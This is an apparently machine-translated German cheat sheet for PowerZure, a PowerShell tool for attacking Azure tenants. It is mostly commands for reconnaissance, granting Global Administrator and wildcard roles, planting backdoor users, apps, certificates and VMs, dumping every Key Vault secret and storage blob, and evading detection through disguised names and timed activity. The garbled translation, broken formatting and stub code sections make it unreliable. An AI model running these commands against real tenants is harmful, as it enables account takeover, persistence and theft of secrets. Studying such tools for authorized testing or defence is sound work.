PowerZure Azure Security Assessment Tool Cheat Sheet

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

PowerZure ist eine Power Shell-Projekt von Ryan Hausknecht (@haus3c) zur Bewertung der Azure-Sicherheit erstellt. Es bietet eine umfassende Reihe von Funktionen für Azure-Aufklärung, Privileg Eskalation, Persistenz und Daten-Exfiltration in Azure-Umgebungen.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Installation von PowerShell

```powershell

Install from PowerShell Gallery

Install-Module -Name PowerZure

Install for current user only

Install-Module -Name PowerZure -Scope CurrentUser

Update existing installation

Update-Module -Name PowerZure

Import module

Import-Module PowerZure ```_

Manuelle Installation

```powershell

Download from GitHub

Invoke-WebRequest -Uri "https://github.com/hausec/PowerZure/archive/master.zip" -OutFile "PowerZure.zip" Expand-Archive -Path "PowerZure.zip" -DestinationPath "C:\Tools\"

Import module

Import-Module C:\Tools\PowerZure-master\PowerZure.psd1

Install dependencies

Install-Module -Name Az Install-Module -Name AzureAD ```_

Gierinstallation

```bash

Clone repository

git clone https://github.com/hausec/PowerZure.git cd PowerZure

Import in PowerShell

Import-Module .\PowerZure.psd1 ```_

Basisnutzung

Modulaufbau

```powershell

Import PowerZure

Import-Module PowerZure

Get available commands

Get-Command -Module PowerZure

Get help for specific function

Get-Help Invoke-AzureRecon -Full

Check module version

Get-Module PowerZure ```_

Authentication

```powershell

Interactive authentication

Connect-AzAccount

Service principal authentication

$credential = Get-Credential Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"

Certificate authentication

Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"

Managed identity authentication (from Azure VM)

Connect-AzAccount -Identity ```_

Befehlsnummer

Reconnaissance Funktionen

| | Function | Description | | | --- | --- | | | Invoke-AzureRecon | Comprehensive Azure reconnaissance | | | | Get-AzureTargets | Identify potential targets | | | | Get-AzureUsers | Enumerate Azure AD users | | | | Get-AzureGroups | Enumerate Azure AD groups | | | | Get-AzureApps | Enumerate applications | | | | Get-AzureResources | Enumerate Azure resources | |

Privilege Escalation Funktionen

| | Function | Description | | | --- | --- | | | Invoke-AzurePrivEsc | Automated privilege escalation | | | | Get-AzureRoleAssignments | Check role assignments | | | | Set-AzureRole | Assign roles to principals | | | | Get-AzureKeyVaults | Enumerate Key Vaults | | | | Get-AzureVMs | Enumerate virtual machines | |

Persistenzfunktionen

| | Function | Description | | | --- | --- | | | New-AzureBackdoor | Create backdoor accounts | | | | Set-AzureUserPassword | Change user passwords | | | | New-AzureApplication | Create malicious applications | | | | Add-AzureKeyVaultSecret | Add secrets to Key Vault | |

Aufklärung und Information

Umfassende Aufklärung

```powershell

Run full reconnaissance

Invoke-AzureRecon

Reconnaissance with specific subscription

Invoke-AzureRecon -SubscriptionId "subscription-id"

Save reconnaissance results

Invoke-AzureRecon|Out-File "azure_recon.txt"

Reconnaissance with verbose output

Invoke-AzureRecon -Verbose ```_

Benutzer- und Gruppenaufzählung

```powershell

Get all Azure AD users

$users = Get-AzureUsers

Get users with specific role

$adminUsers = Get-AzureUsers|Where-Object \\{$_.AssignedRoles -contains "Global Administrator"\\}

Get all groups

$groups = Get-AzureGroups

Get group members

$groupMembers = Get-AzureGroupMembers -GroupId "group-id"

Get privileged groups

$privilegedGroups = Get-AzureGroups|Where-Object \\{$.DisplayName -like "admin"\\} ```

Anmeldung und Service Hauptaufzählung

```powershell

Get all applications

$apps = Get-AzureApps

Get applications with high privileges

$highPrivApps = Get-AzureApps|Where-Object \\{$_.RequiredResourceAccess.ResourceAppId -contains "00000003-0000-0000-c000-000000000000"\\}

Get service principals

$servicePrincipals = Get-AzureServicePrincipals

Get application secrets and certificates

$appSecrets = Get-AzureAppSecrets -ApplicationId "app-id" ```_

Ressourcenzählung

```powershell

Get all Azure resources

$resources = Get-AzureResources

Get virtual machines

$vms = Get-AzureVMs

Get storage accounts

$storageAccounts = Get-AzureStorageAccounts

Get Key Vaults

$keyVaults = Get-AzureKeyVaults

Get SQL databases

$sqlDatabases = Get-AzureSQLDatabases ```_

Abo und Tenant Information

```powershell

Get tenant information

$tenantInfo = Get-AzureTenantInfo

Get subscription information

$subscriptions = Get-AzureSubscriptions

Get current context

$context = Get-AzContext

Get role assignments

$roleAssignments = Get-AzureRoleAssignments ```_

Vorrechte Eskalation

Automatisierte Vorrechte Eskalation

```powershell

Run automated privilege escalation

Invoke-AzurePrivEsc

Privilege escalation with specific target

Invoke-AzurePrivEsc -Target "subscription-id"

Check for privilege escalation paths

Get-AzurePrivEscPaths

Test specific privilege escalation technique

Test-AzurePrivEsc -Technique "RoleAssignment" ```_

Rollenbasierte Vorrechte Eskalation

```powershell

Check current role assignments

$currentRoles = Get-AzRoleAssignment

Assign Global Administrator role

Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Global Administrator"

Assign Contributor role to subscription

Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Contributor" -Scope "/subscriptions/subscription-id"

Create custom role with high privileges

$customRole = New-AzureCustomRole -Name "CustomAdmin" -Permissions @("*") ```_

Schlüssel Vault Privilege Eskalation

```powershell

Check Key Vault access

$keyVaultAccess = Test-AzureKeyVaultAccess -VaultName "vault-name"

Get Key Vault secrets

$secrets = Get-AzureKeyVaultSecrets -VaultName "vault-name"

Extract credentials from Key Vault

$credentials = Get-AzureKeyVaultCredentials -VaultName "vault-name"

Add malicious secret to Key Vault

Add-AzureKeyVaultSecret -VaultName "vault-name" -SecretName "backdoor" -SecretValue "password123" ```_

Virtuelle Maschine Privilege Escaling

```powershell

Check VM access

$vmAccess = Test-AzureVMAccess -VMName "vm-name"

Execute commands on VM

Invoke-AzureVMCommand -VMName "vm-name" -Command "whoami"

Get VM credentials

$vmCreds = Get-AzureVMCredentials -VMName "vm-name"

Install backdoor on VM

Install-AzureVMBackdoor -VMName "vm-name" ```_

Persistenztechniken

Benutzerkonto Persistence

```powershell

Create backdoor user

New-AzureBackdoor -Username "service-account" -Password "ComplexPassword123"

Change existing user password

Set-AzureUserPassword -UserPrincipalName "user@domain.com" -Password "NewPassword123"

Add user to privileged group

Add-AzureUserToGroup -UserPrincipalName "user@domain.com" -GroupId "admin-group-id"

Assign privileged role to user

Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Global Administrator" ```_

Anwendungsbasierte Beständigkeit

```powershell

Create malicious application

$app = New-AzureApplication -DisplayName "LegitimateApp" -RequiredResourceAccess $permissions

Add application secret

$secret = New-AzureApplicationSecret -ApplicationId $app.AppId

Grant application permissions

Grant-AzureApplicationPermissions -ApplicationId $app.AppId -Permissions @("User.Read.All", "Directory.Read.All")

Create service principal for application

$sp = New-AzureServicePrincipal -ApplicationId $app.AppId ```_

Zertifikatbasierte Persistence

```powershell

Generate certificate for authentication

$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My"

Add certificate to application

Add-AzureApplicationCertificate -ApplicationId "app-id" -Certificate $cert

Use certificate for authentication

Connect-AzAccount -ServicePrincipal -CertificateThumbprint $cert.Thumbprint -ApplicationId "app-id" -TenantId "tenant-id" ```_

Ressourcenbasierte Persistenz

```powershell

Create backdoor storage account

$storageAccount = New-AzureStorageAccount -Name "backdoorstorage" -ResourceGroupName "rg-name"

Create backdoor Key Vault

$keyVault = New-AzureKeyVault -Name "backdoorvault" -ResourceGroupName "rg-name"

Create backdoor virtual machine

$vm = New-AzureVM -Name "backdoorvm" -ResourceGroupName "rg-name" -Credential $cred ```_

Daten Exfiltration

Azure AD Daten Exfiltration

```powershell

Export all users

$users = Get-AzureUsers $users|Export-Csv -Path "azure_users.csv" -NoTypeInformation

Export group memberships

$groups = Get-AzureGroups foreach ($group in $groups) \\{ $members = Get-AzureGroupMembers -GroupId $group.Id $group|Add-Member -NotePropertyName "Members" -NotePropertyValue $members \\} | $groups | ConvertTo-Json -Depth 3 | Out-File "azure_groups.json" |

Export application information

$apps = Get-AzureApps $apps|Export-Csv -Path "azure_applications.csv" -NoTypeInformation ```_

Speicherkonto Daten Exfiltration

```powershell

List storage accounts

$storageAccounts = Get-AzureStorageAccounts

Download blobs from storage account

foreach ($account in $storageAccounts) \\{ $ctx = New-AzStorageContext -StorageAccountName $account.Name -UseConnectedAccount $containers = Get-AzStorageContainer -Context $ctx

foreach ($container in $containers) \\\\{
    $blobs = Get-AzStorageBlob -Container $container.Name -Context $ctx
    foreach ($blob in $blobs) \\\\{
        Get-AzStorageBlobContent -Blob $blob.Name -Container $container.Name -Context $ctx -Destination ".\downloads\"
    \\\\}
\\\\}

\\} ```_

Schlüsselwort Daten Exfiltration

```powershell

Extract all Key Vault secrets

$keyVaults = Get-AzureKeyVaults

foreach ($vault in $keyVaults) \\{ try \\{ $secrets = Get-AzKeyVaultSecret -VaultName $vault.Name foreach ($secret in $secrets) \\{ $secretValue = Get-AzKeyVaultSecret -VaultName $vault.Name -Name $secret.Name -AsPlainText Write-Output "Vault: $($vault.Name), Secret: $($secret.Name), Value: $secretValue" \\} \\} catch \\{ Write-Warning "Cannot access vault: $($vault.Name)" \\} \\} ```_

Datenbank Daten Exfiltration

```powershell

Extract SQL database information

$sqlServers = Get-AzSqlServer

foreach ($server in $sqlServers) \\{ $databases = Get-AzSqlDatabase -ServerName $server.ServerName -ResourceGroupName $server.ResourceGroupName

foreach ($database in $databases) \\\\{
    # Attempt to connect and extract data
    try \\\\{
        $connectionString = "Server=$($server.FullyQualifiedDomainName);Database=$($database.DatabaseName);Integrated Security=true;"
        # Use connection string to extract data
    \\\\}
    catch \\\\{
        Write-Warning "Cannot access database: $($database.DatabaseName)"
    \\\\}
\\\\}

\\} ```_

Erweiterte Angriffstechniken

Token Manipulation

```powershell

Get current access token

$token = [Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate($context.Account, $context.Environment, $context.Tenant.Id, $null, "https://management.azure.com/", $null).AccessToken

Parse JWT token

$tokenParts = $token.Split('.') $header = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($tokenParts[0])) $payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($tokenParts[1]))

Use token for API calls

$headers = @\\{ 'Authorization' = "Bearer $token" 'Content-Type' = 'application/json' \\} ```_

Übergeordnete Angriffe

```powershell

Enumerate accessible tenants

$tenants = Get-AzTenant

Switch between tenants

foreach ($tenant in $tenants) \\{ Set-AzContext -TenantId $tenant.Id Write-Output "Current tenant: $($tenant.Id)"

# Perform reconnaissance in each tenant
Invoke-AzureRecon

\\} ```_

Übernahme der Ressourcengruppe

```powershell

Find resource groups with weak permissions

$resourceGroups = Get-AzResourceGroup

foreach ($rg in $resourceGroups) \\{ $roleAssignments = Get-AzRoleAssignment -Scope $rg.ResourceId

# Check for overprivileged assignments
$dangerousRoles = $roleAssignments|Where-Object \\\\{$_.RoleDefinitionName -in @("Owner", "Contributor", "User Access Administrator")\\\\}

if ($dangerousRoles) \\\\{
    Write-Output "Potentially exploitable resource group: $($rg.ResourceGroupName)"
\\\\}

\\} ```_

Evasion Techniken

Stealth Operationen

```powershell

Use legitimate application names

$stealthApp = New-AzureApplication -DisplayName "Microsoft Graph PowerShell"

Mimic legitimate service accounts

$stealthUser = New-AzureUser -UserPrincipalName "sync-service@company.com" -DisplayName "Directory Sync Service"

Use existing application IDs

$graphAppId = "14d82eec-204b-4c2f-b7e8-296a70dab67e" # Microsoft Graph PowerShell ```_

Begrenzung der Evasion

```powershell

Implement delays between operations

function Invoke-AzureOperationWithDelay \\{ param($Operation, $Delay = 2)

& $Operation
Start-Sleep -Seconds $Delay

\\}

Randomize operation timing

$users = Get-AzureUsers foreach ($user in $users) \\{ $delay = Get-Random -Minimum 1 -Maximum 5 Start-Sleep -Seconds $delay $groups = Get-AzureUserGroups -UserId $user.Id \\} ```_

Log Evasion

```powershell

Perform operations during business hours

$currentHour = (Get-Date).Hour if ($currentHour -ge 9 -and $currentHour -le 17) \\{ # Perform stealthy operations Invoke-AzureRecon \\}

Use service principal instead of user account

Connect-AzAccount -ServicePrincipal -Credential $spCredential -TenantId $tenantId ```_

Automatisierung und Schrift

Automatisierte Beurteilung Script

```powershell

Comprehensive Azure security assessment

param( [string]$TenantId, [string]$SubscriptionId, [string]$OutputPath = ".\azure_assessment" )

Create output directory

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Authenticate

Connect-AzAccount -TenantId $TenantId

Set subscription context

if ($SubscriptionId) \\{ Set-AzContext -SubscriptionId $SubscriptionId \\}

Perform reconnaissance

Write-Host "Performing reconnaissance..." $recon = Invoke-AzureRecon $recon|Out-File "$OutputPath\reconnaissance.txt"

Check for privilege escalation opportunities

Write-Host "Checking privilege escalation paths..." $privesc = Invoke-AzurePrivEsc $privesc|Out-File "$OutputPath\privilege_escalation.txt"

Export user and group information

Write-Host "Exporting user and group data..." $users = Get-AzureUsers $users|Export-Csv "$OutputPath\users.csv" -NoTypeInformation

$groups = Get-AzureGroups $groups|Export-Csv "$OutputPath\groups.csv" -NoTypeInformation

Export application information

Write-Host "Exporting application data..." $apps = Get-AzureApps $apps|Export-Csv "$OutputPath\applications.csv" -NoTypeInformation

Generate summary report

$summary = @\\{ AssessmentDate = Get-Date TenantId = $TenantId SubscriptionId = $SubscriptionId TotalUsers = $users.Count TotalGroups = $groups.Count TotalApplications = $apps.Count PrivilegeEscalationPaths = $privesc.Count \\}

| $summary | ConvertTo-Json | Out-File "$OutputPath\summary.json" |

Write-Host "Assessment completed. Results saved to $OutputPath" ```_

Continuous Monitoring Script

```powershell

Continuous Azure monitoring script

param( [int]$IntervalMinutes = 60, [string]$LogPath = ".\azure_monitoring.log" )

while ($true) \\{ $timestamp = Get-Date Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append

try \\\\{
    # Check for new users
    $newUsers = Get-AzureUsers|Where-Object \\\\{$_.CreatedDateTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($newUsers) \\\\{
        Write-Output "[$timestamp] New users detected: $($newUsers.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}

    # Check for new applications
    $newApps = Get-AzureApps|Where-Object \\\\{$_.CreatedDateTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($newApps) \\\\{
        Write-Output "[$timestamp] New applications detected: $($newApps.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}

    # Check for role assignments
    $recentRoleAssignments = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
    if ($recentRoleAssignments) \\\\{
        Write-Output "[$timestamp] New role assignments detected: $($recentRoleAssignments.Count)"|Tee-Object -FilePath $LogPath -Append
    \\\\}
\\\\}
catch \\\\{
    Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}

Start-Sleep -Seconds ($IntervalMinutes * 60)

\\} ```_

Fehlerbehebung

Authentifizierungsfragen

```powershell

Clear cached credentials

Clear-AzContext -Force

Test authentication

$context = Get-AzContext if (-not $context) \\{ Write-Error "Not authenticated to Azure" Connect-AzAccount \\}

Verify permissions

$currentUser = Get-AzADUser -UserPrincipalName (Get-AzContext).Account.Id $roleAssignments = Get-AzRoleAssignment -ObjectId $currentUser.Id ```_

Modulfragen

```powershell

Check PowerZure installation

Get-Module PowerZure -ListAvailable

Update PowerZure

Update-Module PowerZure -Force

Reinstall if necessary

Uninstall-Module PowerZure Install-Module PowerZure -Force ```_

Genehmigungsfragen

```powershell

Check current permissions

$permissions = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id

Test specific permissions

try \\{ Get-AzADUser -First 1 Write-Output "User read permission: OK" \\} catch \\{ Write-Output "User read permission: DENIED" \\}

Request additional permissions

Write-Output "Required permissions:" Write-Output "- Directory.Read.All" Write-Output "- User.Read.All" Write-Output "- Application.Read.All" ```_

Integration mit anderen Tools

BlutHound Integration

```powershell

Export data for BloodHound

$users = Get-AzureUsers $groups = Get-AzureGroups $apps = Get-AzureApps

Convert to BloodHound format

$bloodhoundData = @\\{ users = $users|ForEach-Object \\{ @\\{ ObjectIdentifier = $.Id Properties = @\\{ name = $.UserPrincipalName displayname = $.DisplayName enabled = $.AccountEnabled \\} \\} \\} groups = $groups|ForEach-Object \\{ @\\{ ObjectIdentifier = $.Id Properties = @\\{ name = $.DisplayName description = $_.Description \\} \\} \\} \\}

| $bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "azure_bloodhound.json" | ```_

ROADtools Integration

```powershell

Export data for ROADtools

$azureData = @\\{ users = Get-AzureUsers groups = Get-AzureGroups applications = Get-AzureApps servicePrincipals = Get-AzureServicePrincipals \\}

| $azureData | ConvertTo-Json -Depth 3 | Out-File "azure_roadtools.json" | ```_

Ressourcen

• [PowerZure GitHub Repository](__LINK_5___ -%20Ryan%20Hausknecht%20Blog
• (__LINK_5___)
• (LINK_5)
• (__LINK_5___)

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Nutzung von PowerZure. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie Azure Sicherheitsbewertungen durchführen. *